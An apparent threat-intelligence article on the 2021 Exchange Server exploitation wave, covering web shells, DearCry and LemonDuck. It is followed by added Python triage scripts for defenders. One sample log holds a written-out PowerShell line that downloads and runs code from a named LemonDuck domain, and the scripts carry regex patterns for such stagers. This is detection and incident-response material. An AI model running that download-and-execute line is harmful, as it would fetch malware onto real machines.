John Hammond
Exchange Exploitation: Not Dead Yet

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover.

"March Madness" is a jovial nickname for the third month of the year — but in 2021, the cybersecurity industry felt the brunt of March madness for a reason other than basketball: mass exploitation of Microsoft Exchange Servers. Almost two months later, we're still living in the aftermath of this widespread incident.


On March 1, Huntress learned about new vulnerabilities that would offer an unauthorized actor full control of a Microsoft Exchange server. These vulnerabilities were not yet disclosed, but enterprise organizations and small- to medium-sized businesses were already being exploited. On March 2, Microsoft released its first security advisory, warning companies about these dangerous vulnerabilities. Unfortunately, it seemed Microsoft's initial announcement missed the mark.

Microsoft originally described what came to be dubbed "Exchange Marauder" as "limited and targeted [in scope]," yet practically every version of Exchange was vulnerable, and these servers are publicly facing on the open Internet. While cloud servers were not affected and only on-premises installations of Exchange were susceptible to this attack, soon more than 30,000 organizations in the US alone were known to be affected.

Some experts say attacks using these vulnerabilities began as early as January 6. A successful exploit chained together multiple vulnerabilities to eventually gain remote code execution (RCE) on the target host by dropping a "Web shell" in a publicly accessible location. These Web shells were unique files that would process and evaluate code on the server itself and allow anyone who knew the specific key or parameter to run commands and fully control the machine as an administrative user.

The early days of the month were filled with chaos and uncertainty. It was difficult to determine whether the initial patches Microsoft released had taken effect, and if any Web shell was present, you were already compromised and the patch wouldn't help. The cybersecurity industry got scrappy: We were notifying individuals through Reddit, doing threat hunting and intelligence on Twitter, sharing indicators of compromise on GitHub and Pastebin ... whatever was the fastest method to disseminate information.

While the industry was screaming from the rooftops to patch, patch, patch, we also wanted to contribute to the threat intelligence and help inform organizations of potential indicators of compromise (IoCs). The most blatant IoC is a Web shell itself. These Web shells follow the structure of a "China Chopper," a nickname given to a style of simple, minimalist syntax to run a command supplied as part of the Web request.

These have typically been found in the C:\inetpub\wwwroot\aspnet_client directory or its subdirectories, with unfamiliar or random filenames and a .aspx extension. (We have seen a large number of variations of these Web shells and have been archiving them here.)

Initially, these Web shells seemed to slip past almost every antivirus (AV), endpoint detection and response (EDR), or preventive security solution.

An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress

Prevention is hard. By now, just about every AV and EDR product has caught up with these shells. It does show, however, how this small, simple syntax slipped by and shook up the industry.
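As an added defender-side example (not code from the article or from Huntress), this Python script triages a constructed Web shell inventory of the kind the excerpt above shows: it flags .aspx files under the aspnet_client directory that are not on an allowlist, that have random-looking names, or that were modified before Microsoft's March 2 advisory. The inventory line format, the allowlist and the filename heuristic are assumptions of this example.

```python
import re
from datetime import datetime, timezone

# Drop location the article names; compared case-insensitively because NTFS paths are.
SHELL_DIR = r"c:\inetpub\wwwroot\aspnet_client"
# Date of Microsoft's first advisory (from the article); earlier mtimes predate public reporting.
ADVISORY_DATE = datetime(2021, 3, 2, tzinfo=timezone.utc)
# Assumption: an admin-maintained allowlist of .aspx names expected under aspnet_client.
KNOWN_GOOD = {"default.aspx"}
# Machine-looking names: eight or more hex or alphanumeric characters before the extension.
RANDOM_NAME = re.compile(r"^(?:[0-9a-f]{8,}|[A-Za-z0-9]{8,})\.aspx$", re.IGNORECASE)

# Constructed inventory in the spirit of the article's excerpt: path | modified (UTC) | AV/EDR on host.
SAMPLE_INVENTORY = r"""
C:\inetpub\wwwroot\aspnet_client\system_web\a1b2c3d4e5f6.aspx | 2021-02-27T22:14:00 | VendorA EDR
C:\inetpub\wwwroot\aspnet_client\default.aspx                  | 2019-11-03T10:00:00 | VendorA EDR
C:\inetpub\wwwroot\owa\auth\logon.aspx                         | 2020-06-15T08:00:00 | VendorB AV
C:\inetpub\wwwroot\aspnet_client\help.aspx                     | 2021-03-04T03:41:00 | none
"""

def parse_inventory(text):
    """Turn 'path | modified | av' lines into dicts with a UTC datetime."""
    rows = []
    for line in text.strip().splitlines():
        path, modified, av = (field.strip() for field in line.split("|"))
        rows.append({
            "path": path,
            "name": path.rsplit("\\", 1)[-1],
            "modified": datetime.fromisoformat(modified).replace(tzinfo=timezone.utc),
            "av": av,
        })
    return rows

def triage(rows):
    """Return the rows worth a human look, each with the reasons it was flagged."""
    findings = []
    for row in rows:
        name = row["name"].lower()
        in_drop_dir = row["path"].lower().startswith(SHELL_DIR + "\\")
        if not (in_drop_dir and name.endswith(".aspx")) or name in KNOWN_GOOD:
            continue
        reasons = ["unexpected .aspx under aspnet_client"]
        if RANDOM_NAME.match(name):
            reasons.append("random-looking filename")
        if row["modified"] < ADVISORY_DATE:
            reasons.append("modified before the 2021-03-02 advisory")
        findings.append({**row, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in triage(parse_inventory(SAMPLE_INVENTORY)):
        print(f"{f['path']}  [{f['av']}]  ->  {'; '.join(f['reasons'])}")
```

The pre-advisory timestamp is the strongest signal here, matching the red entries in the excerpt: a file that predates the patch cannot have been cleaned up by applying it.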

After the Web shell is in place and the threat actors have gained access, the question becomes "what will they do next?" What becomes of these targets and victims after the compromise? With complete administrative access, the attackers could drop ransomware, enlist the machine in a botnet, deface the victim's websites, steal and sell data … anything they would like.

We have since seen indicators of ransomware targeting these compromised Exchange Servers dubbed "DearCry." DearCry uses both AES and RSA cryptography and leaves files encrypted with a "DEARCRY!" header at the top of the file contents.

Surprisingly, evidence of cryptocurrency miners is more common than ransomware. An old family of cryptomining malware, "LemonDuck," has reemerged.

LemonDuck hides through multiple obfuscated payloads but uses RSA to validate each stage. While there are many domains and IoCs associated with LemonDuck, the most frequent that Huntress has seen as recently as March has been the http[:]//t[.]zker9[.]com and http[:]//t[.]zz3r0[.]com domains.

A persistent foothold of LemonDuck uses PowerShell to download another stager, validating it with RSA.

A clever trick that stagers like this use is appending the current date or time as a variable to the request when fetching data from an external server. This defeats HTTP caching and ensures the content received is always the latest copy.

The downloaded code is then executed with "fileless malware" techniques using the IEX syntax, a PowerShell alias for "Invoke-Expression" that evaluates code on the fly. The next layer of code it pulls down runs yet another stager in memory, obfuscated by using reversed strings. All of these techniques are attempts by this malware to remain undetected by automated solutions or AV/EDR products.

After six stages of obfuscation, we see the raw source code of this LemonDuck malware written in PowerShell. It checks the architecture of the victim, detects the processor type, and downloads the appropriate mining software. LemonDuck installs its own persistence so it can continue to run on reboot and throttles the computer's resources to earn more money for the attacker.
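As an added example, not code from the article or from Huntress, here is a Python triage of constructed PowerShell script-block log records for the stager traits described above: IEX/Invoke-Expression, a download primitive, a date or time appended to the request, reversed-string obfuscation, and the two domains the article names. The log line format, the trait regexes and the two-trait threshold are assumptions of this example.

```python
import re

# Domains the article names as the most frequent LemonDuck infrastructure seen in March.
LEMONDUCK_DOMAINS = ("t.zker9.com", "t.zz3r0.com")

# One regex per trait the article describes; labels are what a hunter sees in the output.
CHECKS = [
    ("in-memory execution (IEX / Invoke-Expression)",
     re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)),
    ("download primitive",
     re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|net\.webclient", re.IGNORECASE)),
    ("cache-busting date/time in request",
     re.compile(r"get-date|\[datetime\]::now|\.ticks\b", re.IGNORECASE)),
    ("reversed-string obfuscation",
     re.compile(r"\[array\]::reverse|\[-1\s*\.\.\s*-|\.length\s*\.\.\s*0\]", re.IGNORECASE)),
]

# Constructed script-block log records (timestamp | host | script text); not real telemetry.
SAMPLE_LOG = r"""
2021-03-10T02:17:55Z|EXCH01|IEX (New-Object Net.WebClient).DownloadString('http://t.zker9.com/?'+(Get-Date).Ticks)
2021-03-10T02:18:01Z|EXCH01|$s='CONSTRUCTED_REVERSED_PAYLOAD';IEX(-join $s[-1..-($s.Length)])
2021-03-10T08:00:00Z|EXCH01|Get-MailboxDatabase | Select-Object Name, Server
2021-03-10T08:05:12Z|WS02|Invoke-WebRequest https://intranet.example/latest.json -OutFile C:\temp\latest.json
"""

def traits_of(script):
    """Return the labels of every LemonDuck-style trait present in one script block."""
    found = [label for label, rx in CHECKS if rx.search(script)]
    lowered = script.lower()
    found += [f"known LemonDuck domain {d}" for d in LEMONDUCK_DOMAINS if d in lowered]
    return found

def triage(log_text, min_traits=2):
    """Flag records with >= min_traits traits or any known domain; a lone download is routine admin work."""
    flagged = []
    for line in log_text.strip().splitlines():
        # maxsplit=2: the script itself may contain pipes (PowerShell pipelines).
        stamp, host, script = line.split("|", 2)
        traits = traits_of(script)
        if len(traits) >= min_traits or any(t.startswith("known LemonDuck") for t in traits):
            flagged.append({"time": stamp, "host": host, "traits": traits, "script": script})
    return flagged

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG):
        print(f"{rec['time']} {rec['host']}: {', '.join(rec['traits'])}")
```

Requiring two traits keeps an ordinary Invoke-WebRequest from an administrator's workstation out of the queue, while a single hit on a known domain is flagged regardless.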

Unfortunately, around 6% of Exchange Servers today have not been patched and are still vulnerable. These exploits can result in a full domain compromise and cannot be taken lightly.

Microsoft has released its April Security Update, disclosing even more critical vulnerabilities against Exchange. Allegedly, these vulnerabilities have been exploited in the wild, but the impetus to patch should be the same as in March. Two of these new vulnerabilities don't require authentication and can be triggered without user interaction, ultimately gaining the attacker RCE. These vulnerabilities are grave and should not be neglected. Threat hunters and security researchers will continue to monitor for any IoCs and share new information as it is released.

We cannot rely on automated solutions alone. Automation is divine, but manual analysis and human investigation are musts. China Chopper Web shells slid under the radar, post-access malware and Trojans continue to bypass defenses with clever obfuscation and evasion techniques — and this research requires context and expertise from security practitioners. While the mass exploitation of Exchange Servers has been a wake-up call, it takes all parties playing in concert for the industry to react, respond, and recover.

John Hammond is a Security Researcher at Huntress as well as a cybersecurity instructor, developer, red teamer, and CTF enthusiast. John is a former Department of Defense Cyber Training Academy curriculum developer and teacher for the Cyber Threat Emulation course, educating ...